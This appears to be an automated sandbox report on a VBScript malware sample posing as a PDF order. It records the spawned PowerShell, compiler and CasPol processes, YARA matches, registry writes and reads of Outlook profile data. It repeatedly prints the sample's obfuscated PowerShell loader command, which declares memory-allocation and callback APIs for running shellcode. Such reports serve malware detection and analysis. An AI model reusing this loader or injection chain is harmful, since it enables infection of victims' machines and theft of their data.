NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: Initial file: Skakspillene.ShellExecute Squawky, " " & chrw(34) & B6 & chrw(34), "", "", 0
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5068
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5068
        Source: Ordine n.47201 pdf.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: amsi64_5812.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4C8B70
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4C87F8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4CE844
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4C0870
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4C6BE0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D4C6420
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200F9020
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200F7888
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200FC178
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200FDF10
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200F4B28
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200FD231
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20103418
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20101834
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20102FD8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20100070
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20100015
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AB206 NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AB1D5 NtQuerySystemInformation,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
        Source: Ordine n.47201 pdf.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dll
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AAAB6 AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AAA7F AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1Jump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Necrological\Ignoreringers\Skifret", "6wJcQOsCOQG60O6XBOsCm9txAZuB6hLiwCxxAZtxAZuBwj60KijrAptvcQGb6wLsresCgvjr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skoleeksempel = """SmADrdZodSy-CoTbl", "", "", "0")
        Source: Yara matchFile source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
